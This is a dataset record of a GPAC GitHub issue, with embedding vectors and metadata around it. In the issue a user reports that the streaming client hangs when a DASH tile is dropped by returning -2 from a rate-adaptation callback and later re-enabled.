-0.004416094161570072, -0.0176323764026165, -0.0071041518822312355, 0.005132109858095646, -0.004276091232895851, 0.02432052046060562, -0.005644120741635561, -0.02603255584836006, 0.00420008972287178, -0.006604141090065241, 0.014360306784510612, 0.017152367159724236, 0.028640612959861755, -0.019280411303043365, -0.012272262014448643, 0.03417672961950302, 0.0032220687717199326, 0.003564076265320182, -0.010056215338408947, -0.0017270368989557028, 0.018432393670082092, 0.025872552767395973, -0.005580119322985411, -0.028560610488057137, 0.0057401228696107864, -0.0021980470046401024, 0.00413608830422163, 0.01113623846322298, -0.01758437603712082, -0.0037520802579820156, 0.008148173801600933, 0.0007465159287676215, 0.01132024172693491, 0.004220090340822935, -0.012056257575750351, -0.011344242841005325, 0.0028540610801428556, -0.003024064702913165, -0.011176238767802715, 0.004524096846580505, 0.014048300683498383, -0.01947241649031639, 0.0018230389105156064, 0.018736399710178375, -0.0003875082766171545, 0.003590076696127653, -0.016560353338718414, 0.0005645120400004089, 0.01700836420059204, 0.03233668953180313, 0.0018610397819429636, -0.0035540759563446045, -0.0007390158134512603, 0.006128130946308374, 0.015432329848408699, 0.009496202692389488, 0.005892125889658928, -0.0031360669527202845, 0.030224645510315895, 0.021856466308236122, 0.0019290412310510874, 0.011832253076136112, 0.04291291907429695, 0.0023100494872778654, -0.010080215521156788, 0.0031120665371418, 0.016344349831342697, -0.001779037993401289, 0.004276091232895851, 0.013712293468415737, -0.018832402303814888, 0.005376114975661039, 0.01766437664628029, 0.018624398857355118, 0.008368179202079773, -0.010024214163422585, 0.016688356176018715, 0.008584183640778065, 0.01604834385216236, 0.02681657299399376, 0.008092173375189304, 0.020480437204241753, 0.005480117164552212, 0.00258005503565073, 0.013088279403746128, 0.009760208427906036, -0.011704250238835812, -0.0024160516913980246, -0.004756101872771978, 0.00045825980487279594, 0.013048279099166393, -0.00936019979417324, -0.03236869350075722, 0.016976362094283104, -0.012000256218016148, 0.014584311284124851, 0.007888169027864933, 0.023152494803071022, -0.011144238524138927, 0.009568204171955585, -0.003618077374994755, 0.020448436960577965, 0.004308091942220926, -0.010656227357685566, -0.007292155642062426, 0.037088792771101, 0.0059961280785501, -0.022800486534833908, -0.018352393060922623, -0.0022700484842061996, 0.009640205651521683, -0.0064841387793421745, -0.0005540118436329067, 0.02118445374071598, 0.01766437664628029, -0.00492010498419404, 0.015928341075778008, -0.02160046249628067, -0.015904339030385017, 0.02948863059282303, 0.005040107760578394, 0.007680164184421301, -0.009056193754076958, -0.0021760466042906046, 0.028384607285261154 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ There is a similar issues[ here](https://github.com/gpac/gpac/issues/2084), but the code provided no longer works, the link provided in the answer also die. I tried drop the top-left tile by returning -2, then in the later iterations, I want to turn on streaming for the top-left tile by returning 0. However, the streaming client hang without returning errors: ![image](https://user-images.githubusercontent.com/10344401/187929137-00052c3e-fafc-4434-826f-b81f02bc2209.png) Is there any option to temporarily drop a tile, then later enable streaming for that tile? This drop tile approach is very popular in the research community. Here is the code of the tile adaptation algorithm: ``` def on_rate_adaptation(self, group, base_group, force_low_complexity, stats): if group.SRD.x == 0 and group.SRD.y == 0: print(f'We are adapting on globalid: {global_id}, group_idx:{group.idx}, active quality: {stats.active_quality_idx}') if stats.active_quality_idx != -2: return -2 else: return 0 return 0 ```
Tile dropping with -2 option does not work when switching between -2 and other levels alternatively
https://api.github.com/repos/gpac/gpac/issues/2250/comments
9
2022-09-01T13:44:50
2022-10-28T19:06:15Z
https://github.com/gpac/gpac/issues/2250
1,358,876,408
2,250
false
This is a GitHub Issue repo:gpac owner:gpac Title : Tile dropping with -2 option does not work when switching between -2 and other levels alternatively Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ There is a similar issues[ here](https://github.com/gpac/gpac/issues/2084), but the code provided no longer works, the link provided in the answer also die. I tried drop the top-left tile by returning -2, then in the later iterations, I want to turn on streaming for the top-left tile by returning 0. However, the streaming client hang without returning errors: ![image](https://user-images.githubusercontent.com/10344401/187929137-00052c3e-fafc-4434-826f-b81f02bc2209.png) Is there any option to temporarily drop a tile, then later enable streaming for that tile? This drop tile approach is very popular in the research community. Here is the code of the tile adaptation algorithm: ``` def on_rate_adaptation(self, group, base_group, force_low_complexity, stats): if group.SRD.x == 0 and group.SRD.y == 0: print(f'We are adapting on globalid: {global_id}, group_idx:{group.idx}, active quality: {stats.active_quality_idx}') if stats.active_quality_idx != -2: return -2 else: return 0 return 0 ``` --- end body ---
2,014
[ -0.00688856840133667, -0.007097188849002123, -0.016100596636533737, -0.0023889096919447184, 0.01492250431329012, 0.021729260683059692, 0.00017014335026033223, 0.05612301453948021, -0.020125746726989746, -0.00011786037794081494, -0.02037118189036846, -0.006671766750514507, 0.03874615207314491, 0.012009997852146626, 0.007620785851031542, 0.025279900059103966, 0.0009812323842197657, 0.027537912130355835, -0.014472538605332375, -0.036193616688251495, 0.026637978851795197, -0.015838798135519028, -0.031939394772052765, 0.032921139150857925, -0.0029125064611434937, -0.008095295168459415, -0.015503369271755219, 0.0020677978172898293, -0.037928033620119095, -0.011003711260855198, -0.0031027193181216717, 0.013646237552165985, 0.010627375915646553, 0.015356107614934444, 0.05124702304601669, -0.01018559094518423, 0.05602484196424484, 0.060180891305208206, -0.002924778265878558, 0.03143216297030449, -0.04529111087322235, -0.015462463721632957, -0.04031694307923317, 0.009032042697072029, -0.012189984321594238, 0.019454888999462128, 0.003939246758818626, 0.006921293213963509, -0.02763608656823635, -0.019094916060566902, 0.009596545249223709, -0.025918034836649895, -0.03563729673624039, -0.015765167772769928, -0.023283688351511955, -0.048203617334365845, 0.03684811294078827, 0.0024114081170409918, -0.008410271257162094, 0.02112385258078575, 0.017851373180747032, 0.010324671864509583, -0.018211346119642258, 0.009981061331927776, -0.001734413905069232, 0.01852223090827465, -0.024150894954800606, 0.029730472713708878, -0.034721001982688904, -0.0033583815675228834, -0.03351018577814102, -0.0370444618165493, 0.009522913955152035, 0.016665099188685417, 0.01999484747648239, -0.045683808624744415, 0.039433371275663376, 0.015830617398023605, -0.007751684635877609, -0.0214183758944273, -0.060999009758234024, 0.025688961148262024, -0.06603863090276718, -0.014767061918973923, 0.015585181303322315, 0.005833194125443697, -0.03524459898471832, -0.05906824767589569, -0.006450874265283346, 0.03648814186453819, -0.01376077439635992, 0.009228390641510487, 0.0188167542219162, -0.020534805953502655, -0.003804256906732917, 0.017262326553463936, -0.04336034879088402, 0.011191878467798233, -0.0468946248292923, -0.01131459604948759, -0.0280778706073761, 0.0060786297544837, -0.004769638180732727, -0.0006754601490683854, 0.043131273239851, -0.01368714403361082, 0.0007163661066442728, -0.020207557827234268, 0.006679947953671217, 0.12991741299629211, 0.017573213204741478, -0.010815543122589588, -0.0011269600363448262, -0.013948941603302956, -0.02740701287984848, -0.004925081040710211, -0.0041540032252669334, -0.016656918451189995, -0.01659964956343174, -0.023594575002789497, 0.014726155437529087, -0.021107489243149757, -0.06440238654613495, 0.011036436073482037, -0.04129868745803833, 0.011707293801009655, -0.0007971554296091199, 0.006295431405305862, -0.023463675752282143, -0.011969092302024364, -0.03707718849182129, -0.025983484461903572, -0.01999484747648239, -0.05167244374752045, 0.019962122663855553, 0.031497612595558167, -0.01976577378809452, 0.026065295562148094, -0.02581986039876938, 0.01037375908344984, -0.02676887810230255, -0.025508973747491837, 0.03267570212483406, 0.008672069758176804, -0.026588892564177513, -0.006348609458655119, -0.009841980412602425, 0.012394514866173267, 0.002157790819182992, 0.03910612314939499, -0.0405132919549942, 0.0046264673583209515, -0.028585104271769524, 0.00016503009828738868, 0.021320201456546783, 0.03079402819275856, -0.015086128376424313, -0.0079234903678298, -0.018964016810059547, -0.023709110915660858, -0.0031027193181216717, -0.006401787046343088, 0.0015738578513264656, 0.018129533156752586, -0.03884432837367058, -0.00034386597690172493, 0.016804179176688194, 0.04306582361459732, -0.05108339712023735, 0.012803574092686176, -0.01040648389607668, -0.008434814400970936, 0.007976667955517769, 0.06276614964008331, -0.010864630341529846, -0.010087416507303715, 0.011977273039519787, 0.0036692670546472073, -0.0015851070638746023, -0.004892356228083372, -0.04025149345397949, -0.01322899665683508, -0.015511550940573215, -0.01178092509508133, 0.040676914155483246, -0.023087339475750923, -0.002064729807898402, 0.0002442854456603527, 0.010840087197721004, -0.017785923555493355, 0.015446101315319538, 0.034721001982688904, 0.03076130338013172, -0.004679644946008921, 0.005698204040527344, -0.02521445043385029, -0.0043687596917152405, -0.039400648325681686, 0.011478220112621784, -0.02503446489572525, -0.017965910956263542, -0.042902201414108276, -0.024216344580054283, -0.004074236378073692, -0.031137637794017792, 0.02150018699467182, -0.005178698338568211, 0.015519731678068638, 0.013826224021613598, -0.08135382831096649, -0.0160678718239069, -0.02969774790108204, 0.007240360137075186, 0.020322095602750778, -0.04149503633379936, 0.031268537044525146, 0.013662599958479404, 0.021860159933567047, -0.021598361432552338, 0.0007823270279914141, 0.03534277528524399, 0.0005619460134766996, -0.015249752439558506, -0.027357924729585648, -0.0338701568543911, -0.0015994241693988442, 0.009302021935582161, -0.014938866719603539, -0.03998969495296478, -0.032053932547569275, 0.02694886550307274, -0.009751987643539906, -0.015691537410020828, -0.013973485678434372, 0.003162032924592495, 0.004786000587046146, -0.005096886307001114, 0.00881114974617958, -0.004851450212299824, -0.020976589992642403, -0.0013836451107636094, 0.05736655741930008, -0.024936290457844734, -0.01402257289737463, 0.0041110520251095295, 0.010823724791407585, 0.01668146252632141, 0.012018179520964622, -0.0007214793586172163, -0.02161472477018833, -0.009981061331927776, -0.039662446826696396, 0.006553139537572861, -0.008328459225594997, 0.013678962364792824, 0.01886584237217903, 0.023610936477780342, 0.004573289304971695, 0.016084235161542892, -0.021025678142905235, 0.029746834188699722, 0.017867736518383026, -0.021696535870432854, -0.015552456490695477, 0.034426480531692505, 0.0022293764632195234, 0.003595636459067464, 0.003536322619765997, -0.0050314366817474365, -0.02028937079012394, -0.032659340649843216, -0.03478645160794258, -0.049676232039928436, 0.0033113397657871246, 0.01037375908344984, -0.016272401437163353, -0.024118170142173767, -0.032544802874326706, 0.04712370038032532, -0.005002802237868309, -0.0057800160720944405, 0.018162257969379425, -0.027652448043227196, 0.028699642047286034, -0.021974697709083557, -0.014145290479063988, 0.03293750062584877, 0.0012875159736722708, -0.08292461931705475, -0.008655707351863384, -0.006381334271281958, 0.013327171094715595, -0.014873417094349861, 0.009850162081420422, 0.02555806189775467, 0.0063690622337162495, -0.004389212466776371, -0.0016791907837614417, 0.023987270891666412, -0.022531017661094666, -0.013564425520598888, 0.025427162647247314, 0.015315202064812183, -0.024330882355570793, -0.029763197526335716, -0.03192303329706192, -0.0011995681561529636, 0.02393818460404873, -0.0020463219843804836, -0.02251465618610382, 0.042182255536317825, -0.032053932547569275, -0.006933565251529217, -0.027096126228570938, -0.016967803239822388, -0.033297475427389145, 0.01762229949235916, -0.008291644044220448, 0.0023991363123059273, 0.008614800870418549, -0.003591545857489109, -0.004454662092030048, -0.02006029710173607, -0.003992424346506596, 0.01619059033691883, -0.001970645971596241, -0.03933519870042801, 0.011429132893681526, -0.0712091475725174, 0.010480114258825779, -0.009719262830913067, -0.018358606845140457, -0.011772743426263332, -0.003162032924592495, -0.01464434340596199, -0.02581986039876938, -0.03015589527785778, -0.038222555071115494, 0.002816377207636833, 0.010259222239255905, -0.04388394579291344, -0.010701006278395653, 0.06050813943147659, 0.012623587623238564, -0.0005246193031780422, -0.030581317842006683, 0.002542307134717703, 0.018162257969379425, 0.043458521366119385, -0.0018520186422392726, 0.0011924095451831818, 0.0316939614713192, -0.009138397872447968, 0.013384439051151276, 0.04149503633379936, -0.023136427626013756, 0.004802362993359566, -0.01209999155253172, 0.01451344508677721, -0.015290658921003342, 0.05016710236668587, -0.02902689017355442, -0.018276795744895935, 0.011003711260855198, -0.01481614913791418, 0.013294446282088757, -0.003986288793385029, -0.04509476199746132, -0.0120836291462183, -0.001547269057482481, -0.033641085028648376, -0.002227331046015024, -0.02107476443052292, 0.005432315170764923, -0.015266114845871925, 0.004961896222084761, 0.03681538999080658, -0.02801242098212242, -0.04889083653688431, 0.005530489608645439, -0.03455737978219986, -0.013278083875775337, 0.02830694429576397, -0.03316657617688179, -0.00939201470464468, 0.03527732565999031, 0.024789029732346535, 0.014996135607361794, -0.014546169899404049, 0.02514900080859661, -0.002062684390693903, -0.004671463742852211, -0.02089477889239788, -0.03652086481451988, -0.0013028557877987623, 0.015086128376424313, -0.022416481748223305, -0.03756805881857872, -0.002566850744187832, -0.020043933764100075, 0.008942048996686935, -0.034655552357435226, 0.0022007422521710396, 0.022220132872462273, 0.0006187030812725425, 0.028094232082366943, -0.018947653472423553, 0.0027222936041653156, 0.003912657964974642, -0.004327853675931692, 0.02063298039138317, -0.017115065827965736, -0.029861371964216232, -0.01829315721988678, 0.01313900388777256, 0.03985879570245743, -0.007858040742576122, 0.014169834554195404, -0.03331383690237999, 0.03033588081598282, 0.022727366536855698, -0.004671463742852211, -0.013678962364792824, -0.020502081140875816, 0.04264040291309357, -0.015323382802307606, 0.008663888089358807, 0.00021616258891299367, 0.04954533278942108, -0.026441629976034164, 0.0613589808344841, -0.014578894712030888, -0.013785318471491337, -0.004855541046708822, -0.031072188168764114, -0.0002541284484323114, -0.04463661462068558, 0.022858265787363052, -0.017065977677702904, -0.03423013165593147, -0.01704961620271206, 0.006409968249499798, -0.008729337714612484, 0.022007422521710396, 0.03854980319738388, 0.0006192143773660064, -0.027619723230600357, -0.006090901792049408, -0.021222027018666267, -0.01134732086211443, -0.006622679531574249, 0.039695169776678085, 0.011936367489397526, -0.034197404980659485, 0.01232906524091959, -0.01592879183590412, -0.01889856718480587, -0.01999484747648239, 0.051476094871759415, 0.0007751684752292931, -0.032888416200876236, 0.01046375185251236, 0.017327776178717613, -0.032053932547569275, 0.00859843846410513, -0.012263615615665913, -0.00849208328872919, -0.00850844569504261, 0.011396408081054688, 0.0016587377758696675, 0.012729943729937077, -0.00008615823753643781, -0.0025545789394527674, 0.046436477452516556, 0.023201877251267433, 0.02928868681192398, -0.0015452237566933036, -0.07683780789375305, 0.005775925703346729, -0.04565108194947243, 0.017082341015338898, -0.033330198377370834, 0.021925609558820724, -0.0032765697687864304, -0.006381334271281958, -0.022269219160079956, 0.019814860075712204, -0.026441629976034164, -0.004871902987360954, -0.029615934938192368, 0.03904067352414131, 0.02613074518740177, 0.009171122685074806, 0.018456781283020973, -0.005452768411487341, 0.01481614913791418, -0.0041540032252669334, -0.03282296657562256, 0.0050068930722773075, 0.008365274406969547, -0.03200484439730644, -0.004213316831737757, -0.021352926269173622, -0.02763608656823635, 0.014865236356854439, -0.025378074496984482, 0.01040648389607668, 0.032283004373311996, -0.014652525074779987, -0.034884627908468246, -0.006647223141044378, -0.01159275695681572, -0.01093826163560152, -0.03452465310692787, -0.02107476443052292, -0.033902883529663086, -0.006819028407335281, -0.028519654646515846, 0.025247175246477127, 0.014824329875409603, -0.008095295168459415, -0.012549957260489464, 0.005988636519759893, 0.02349640056490898, -0.01852223090827465, 0.02089477889239788, -0.00013230530021246523, -0.020829329267144203, 0.012059085071086884, 0.012198165990412235, -0.023889096453785896, -0.0058045596815645695, 0.001617831876501441, 0.036422692239284515, -0.012811755761504173, 0.008013483136892319, -0.007894855923950672, 0.010439207777380943, -0.008868418633937836, 0.02190924808382988, -0.024559956043958664, 0.04339307174086571, -0.013736231252551079, 0.019193090498447418, -0.010831905528903008, 0.030695853754878044, -0.013253539800643921, 0.007048101630061865, -0.036979012191295624, -0.006189076229929924, 0.007592151407152414, -0.013597150333225727, -0.008762062527239323, 0.010774637572467327, -0.00026461060042493045, 0.010422846302390099, -0.00856571365147829, 0.017851373180747032, -0.005456858780235052, 0.028846902772784233, -0.012533594854176044, 0.001381599809974432, 0.01464434340596199, 0.0019604195840656757, 0.006655404344201088, -0.009195665828883648, 0.011069160886108875, 0.008050298318266869, -0.023660022765398026, -0.011265508830547333, 0.02743973769247532, -0.0376335084438324, 0.0035813192371279, -0.015666993334889412, 0.0006764827994629741, 0.0050314366817474365, 0.0007669872720725834, -0.0009352131746709347, -0.014619800262153149, -0.013736231252551079, 0.008201650343835354, -0.04214952886104584, 0.008729337714612484, 0.028257856145501137, 0.00437694089487195, -0.030221344903111458, 0.02419998310506344, -0.0053382315672934055, -0.007935761474072933, -0.0367499403655529, 0.014947048388421535, 0.038386180996894836, -0.002139383228495717, -0.0019021284533664584, 0.041462309658527374, 0.0014859100338071585, 0.003796075703576207, 0.010930079966783524, 0.03835345432162285, -0.011805468238890171, 0.00259343977086246, 0.01875130459666252, -0.010840087197721004, -0.031333986669778824, -0.023054614663124084, 0.0010016853921115398, 0.0030229524709284306, 0.005076433066278696, -0.0013222860870882869, 0.02393818460404873, 0.01739322580397129, 0.022351032122969627, 0.07297628372907639, -0.012149078771471977, -0.00028915420989505947, 0.008385727182030678, 0.0007317058625631034, 0.009203847497701645, -0.02187652327120304, 0.006994924042373896, 0.04709097370505333, -0.04100416228175163, 0.04928353428840637, -0.016951441764831543, -0.02763608656823635, 0.03580092266201973, -0.003151806304231286, -0.016771454364061356, -0.010627375915646553, -0.035899095237255096, -0.014938866719603539, 0.008786606602370739, -0.019634874537587166, -0.020109383389353752, -0.03351018577814102, -0.006459055468440056, 0.04264040291309357, 0.02352912537753582, 0.005555033218115568, -0.029092339798808098, -0.013204453513026237, 0.013400801457464695, -0.001850995933637023, 0.027603361755609512, -0.027096126228570938, 0.006962199229747057, 0.011183696798980236, 0.005943640135228634, -0.005346412770450115, 0.025050826370716095, -0.02891235239803791, 0.010897355154156685, 0.021467462182044983, 0.029681384563446045, 0.02043663151562214, -0.022154683247208595, 0.026736153289675713, 0.049741681665182114, -0.0049332622438669205, -0.0025259447284042835, -0.018276795744895935, -0.0016914625884965062, 0.010021966882050037, -0.01878402940928936, 0.013572607189416885, 0.010676463134586811, 0.011044616810977459, -0.030875839293003082, -0.0013468296965584159, 0.024461781606078148, -0.018800392746925354, 0.010512839071452618, 0.024036359041929245, 0.02842148020863533, 0.014202559366822243, -0.015650631859898567, 0.007350806146860123, -0.012828118167817593, 0.028208769857883453, -0.01630512624979019, -0.04375304654240608, 0.005775925703346729, -0.006810847204178572, 0.01889856718480587, -0.03655359148979187, 0.009719262830913067, 0.006377243436872959, 0.015446101315319538, -0.006225891411304474, -0.011412770487368107, 0.024756304919719696, 0.013736231252551079, 0.009588363580405712, 0.013948941603302956, -0.017933186143636703, 0.03339564800262451, 0.014047116041183472, -0.0012322928523644805, 0.002112794201821089, -0.006585864350199699, -0.0428367517888546, 0.029730472713708878, -0.0021905156318098307, 0.0015595408622175455, -0.020911140367388725, 0.0044914777390658855, -0.009334746748209, 0.008655707351863384, 0.00342587660998106, -0.021058402955532074, 0.0243145190179348, 0.009694719687104225, 0.014767061918973923, 0.018800392746925354, -0.019814860075712204, -0.0033399739768356085, -0.03760078549385071, -0.006876296829432249, -0.0428367517888546, 0.0056695700623095036, -0.008418451994657516, -0.0045773801393806934, 0.019438525661826134, -0.011666388250887394, -0.03707718849182129, 0.0015278386417776346, 0.012558137997984886, 0.023889096453785896, -0.0022498294711112976, 0.009457464329898357, -0.033068399876356125, -0.003839026903733611, 0.03282296657562256, 0.0016975984908640385, -0.03195575997233391, 0.01667328178882599, 0.010790999978780746, 0.008688432164490223, 0.03305203840136528, -0.0023848190903663635, -0.016084235161542892, 0.006937655620276928, -0.013597150333225727, 0.004315581638365984, -0.006221801042556763, 0.005407771561294794, -0.00021475643734447658, -0.0033583815675228834, -0.021598361432552338, -0.008852056227624416, 0.011470039375126362, 0.009195665828883648, 0.008516626432538033, -0.03632451593875885, -0.025345349684357643, 0.0094083771109581, 0.023365501314401627, -0.023087339475750923, -0.005690022837370634, -0.0013723958982154727, -0.006802666001021862, 0.018244070932269096, -0.012091809883713722, -0.014677068218588829, -0.003472918411716819, -0.01889856718480587, -0.016141502186655998, 0.018473144620656967, 0.011740018613636494, 0.00036687558167614043, 0.0164932943880558, 0.009441101923584938, -0.004426028113812208, -0.0460110567510128, 0.016174226999282837, 0.015527913346886635, -0.0030822663102298975, 0.010242859832942486, -0.009032042697072029, -0.01580607332289219, -0.018129533156752586, 0.008966593071818352, -0.010823724791407585, 0.026507079601287842, 0.02989409677684307, -0.021598361432552338, 0.040676914155483246, 0.01481614913791418, -0.004450571723282337, -0.01811317168176174, 0.0027836523950099945, 0.010054691694676876, 0.00905658584088087, -0.03159578517079353, 0.007236269302666187, -0.010111960582435131, 0.008168925531208515, 0.01295083574950695, 0.005424133967608213, -0.0057513820938766, 0.03360835835337639, -0.00465919217094779, -0.011380045674741268, -0.03498280048370361, -0.015830617398023605, -0.02401999570429325, -0.022825540974736214, 0.005428224802017212, -0.03985879570245743, 0.035310048609972, -0.024674491956830025, -0.007003105245530605, -0.008222104050219059, -0.017556849867105484, 0.002626164350658655, 0.009997423738241196, 0.011568213813006878, -0.02382364682853222, -0.03354290872812271, 0.03007408231496811, -0.030139531940221786, 0.016738729551434517, 0.027488823980093002, 0.008827512152493, -0.014930685982108116, -0.021336562931537628, -0.002202787436544895, -0.004033330362290144, 0.032888416200876236, -0.0007956214831210673, 0.011363683268427849, -0.011609119363129139, -0.01637875847518444, -0.022383756935596466, -0.038942500948905945, 0.020616618916392326, -0.02107476443052292, 0.0015257933409884572, -0.03349382430315018, 0.02454359270632267, -0.008827512152493, -0.009514733217656612, 0.018489506095647812, -0.025574423372745514, -0.005816831719130278, -0.05654843896627426, 0.005379137583076954, -0.000037806083128089085, 0.0204039067029953, 0.01912764087319374, 0.025950759649276733, 0.02729247510433197, 0.012860842980444431, 0.021843798458576202, -0.04326217249035835, 0.012075447477400303, -0.026867052540183067, 0.0079971207305789, 0.011453676968812943, -0.0037899399176239967, 0.01347443275153637, 0.00800121109932661, -0.02225285768508911, -0.029795922338962555, 0.009997423738241196, -0.0019972349982708693, -0.00035588210448622704, -0.025361713021993637, -0.014161652885377407, 0.026376182213425636, -0.01322899665683508, -0.015372470021247864, -0.009138397872447968, -0.012132716365158558, -0.01053738221526146, -0.0067249443382024765, -0.05386500433087349, -0.034197404980659485, -0.011805468238890171, -0.008111657574772835, -0.00008251504914369434, -0.008291644044220448, -0.0313994362950325, 0.002894098637625575, 0.015601543709635735, -0.011609119363129139, -0.02364366129040718, -0.02408544532954693, -0.013908036053180695, -0.009596545249223709, 0.02393818460404873, -0.011003711260855198, -0.040218766778707504, -0.001096280524507165, -0.01353170070797205, 0.03076130338013172, 0.007485795766115189, -0.024756304919719696, 0.005775925703346729, -0.03413195535540581, -0.017458675429224968, 0.002759109018370509, 0.0367499403655529, 0.010946442373096943, 0.0073139904998242855, -0.010414664633572102, 0.02266191691160202, 0.021369287744164467, 0.008442996069788933, -0.02405272051692009, 0.0007286379113793373, -0.031137637794017792, 0.0028102414216846228, -0.0011463903356343508, -0.02940322458744049, -0.024609042331576347, -0.04277130216360092, 0.004614195320755243, -0.006471327506005764, 0.023120064288377762, 0.010480114258825779, 0.0188167542219162, 0.006978561636060476, 0.02442905679345131, -0.023807285353541374, -0.013654419220983982, -0.014407088980078697, 0.009449283592402935, -0.0028143320232629776, -0.0082466471940279, -0.0033849705941975117, -0.00901568029075861, -0.014407088980078697, -0.01434163935482502, 0.010308309458196163, -0.02413453347980976, -0.01547064445912838, 0.0009137375163845718, -0.0010635557118803263, -0.011609119363129139, -0.007228088099509478, 0.009105673059821129, 0.028895990923047066, -0.022678280249238014, 0.02066570520401001, 0.011707293801009655, -0.00769850704818964, -0.0031702141277492046, -0.011527307331562042, -0.021892884746193886, -0.02326732687652111, -0.012026360258460045, -0.05474857613444328, -0.031268537044525146, -0.025770772248506546, -0.007358987350016832, -0.037437159568071365, 0.010921899229288101, -0.00546913081780076, 0.023332776501774788, -0.023840010166168213, 0.016018785536289215, -0.003231573151424527, -0.006021361332386732, -0.018080446869134903, 0.02349640056490898, -0.02688341587781906, 0.049970757216215134, -0.022465568035840988, -0.0007634080247953534, -0.0025750319473445415, -0.02408544532954693, -0.006426330655813217, -0.0007204567082226276, -0.01509431004524231, 0.021140214055776596, -0.04277130216360092, -0.02187652327120304, -0.03429558128118515, -0.0015769258607178926, -0.006581773515790701, -0.011445495299994946, 0.038451630622148514, -0.03681538999080658, -0.009719262830913067, -0.0037347166799008846, -0.007837587036192417, 0.013908036053180695, -0.00995651725679636, -0.008025755174458027, 0.018653130158782005, 0.00664313230663538, 0.04054601490497589, -0.0028900080360472202, 0.03162851184606552, -0.031644873321056366, 0.012206346727907658, -0.010880992747843266, -0.030859477818012238, -0.018047722056508064, -0.04938171058893204, -0.012819936498999596, -0.005064161494374275, -0.0022007422521710396, 0.0028920534532517195, 0.012795393355190754, 0.016436025500297546, 0.018587680533528328, -0.012623587623238564, -0.015110672451555729, -0.02182743512094021, 0.010046510957181454, -0.030319519340991974, -0.017655024304986, -0.025852585211396217, 0.02868327870965004, -0.03267570212483406, -0.0002210201637353748, -0.01466070581227541, 0.009784712456166744, -0.020207557827234268, 0.008451176807284355, -0.0025504883378744125, -0.03233209252357483, 0.01607605256140232, 0.0158469807356596, -0.04627285525202751, -0.01675509288907051, 0.00656950194388628, 0.0015973788686096668, 0.004904627799987793, -0.0010415686992928386, 0.0008334594895131886, -0.00849208328872919, -0.023725472390651703, -0.028208769857883453, -0.02069843001663685, -0.04264040291309357, -0.015912430360913277, 0.010570107027888298, 0.020976589992642403, 0.0012558138696476817, -0.004920990206301212, -0.009473826736211777, -0.022351032122969627, 0.0010021966882050037, 0.011772743426263332, 0.037404436618089676, -0.01353170070797205, -0.00877024419605732, 0.03249571844935417, 0.0074162557721138, 0.06904930621385574, -0.013171728700399399, 0.0035690474323928356, 0.005460949614644051, -0.004802362993359566, 0.007633057422935963, 0.0215656366199255, 0.011461857706308365, -0.012369970791041851, -0.045716531574726105, -0.011862736195325851, -0.026098020374774933, -0.02902689017355442, -0.018342245370149612, 0.002309143077582121, 0.017115065827965736, -0.0035813192371279, 0.012983560562133789, 0.02703067660331726, 0.008046207949519157, 0.006921293213963509, -0.009277477860450745, 0.02205650880932808, 0.008222104050219059, 0.018734943121671677, -0.025459887459874153, -0.01078281830996275, 0.0008441973477602005, -0.00714218569919467, -0.02205650880932808, 0.018309520557522774, 0.003918793518096209, -0.05177062004804611, 0.03913884982466698, 0.009841980412602425, 0.011298233643174171, 0.001304900972172618, -0.01754048839211464, -0.019929397851228714, -0.020109383389353752, -0.017818648368120193, 0.006238163448870182, -0.006356790661811829, -0.017867736518383026, -0.0057513820938766, 0.10314854234457016, 0.030106807127594948, -0.01131459604948759, -0.0335756354033947, -0.03976061940193176, -0.020763879641890526, 0.006205438636243343, 0.014562532305717468, 0.017818648368120193, -0.013188091106712818, 0.03270842880010605, 0.014235284179449081, -0.001568744657561183, 0.0037183542735874653, 0.008647525683045387, -0.030172256752848625, 0.002305052476003766, -0.021467462182044983, 0.0025750319473445415, 0.01674691215157509, 0.003630406456068158, 0.005141882691532373, 0.017065977677702904, 0.001300810487009585, 0.016918716952204704, -0.012942655012011528, 0.010856449604034424, -0.014652525074779987, 0.00011555941455299035, -0.005023255478590727, -0.009334746748209, 0.0024584499187767506, -0.02274372987449169, 0.012476326897740364, -0.004241950809955597, 0.008250737562775612, 0.01799863576889038, -0.016059691086411476, 0.006189076229929924, -0.001632148982025683, 0.000694379152264446, -0.006287250202149153, 0.0286505538970232, -0.0022436934523284435, -0.00663495110347867, -0.015568818897008896, 0.0422477051615715, 0.006004998926073313, -0.003397242398932576, -0.014947048388421535, -0.018505869433283806, -0.016648737713694572, -0.012026360258460045, 0.010790999978780746, -0.0031293081119656563, 0.010799180716276169, 0.0027611542027443647, 0.007518520578742027, 0.039204299449920654, -0.005383227951824665, 0.01991303451359272, 0.009776530787348747, -0.028928715735673904, 0.02853601798415184, 0.014333458617329597, -0.011134609580039978, -0.012509051710367203, 0.032201193273067474, -0.025312624871730804, 0.006581773515790701, 0.009457464329898357, -0.005358684342354536, -0.015241571702063084, -0.003620180068537593, 0.004708279389888048, 0.013539882376790047, -0.015069765970110893, 0.026507079601287842, 0.01435800176113844, 0.008557532913982868, -0.00009894136019283906, 0.016174226999282837, -0.01837497018277645, 0.01817862130701542, -0.018734943121671677, -0.011584576219320297, -0.01400621049106121, -0.014120747335255146, 0.022531017661094666, 0.004855541046708822, -0.0064672366715967655, -0.005178698338568211, -0.0031681687105447054, 0.005591848399490118, -0.003771532094106078, 0.011322777718305588, -0.0065408675000071526, -0.0032438449561595917, -0.011969092302024364, -0.006954018026590347, 0.0018315656343474984, 0.0014675023267045617, 0.018096808344125748, -0.0001804976782295853, -0.0011862736428156495, 0.012852661311626434, 0.0021966516505926847, 0.00931838434189558, 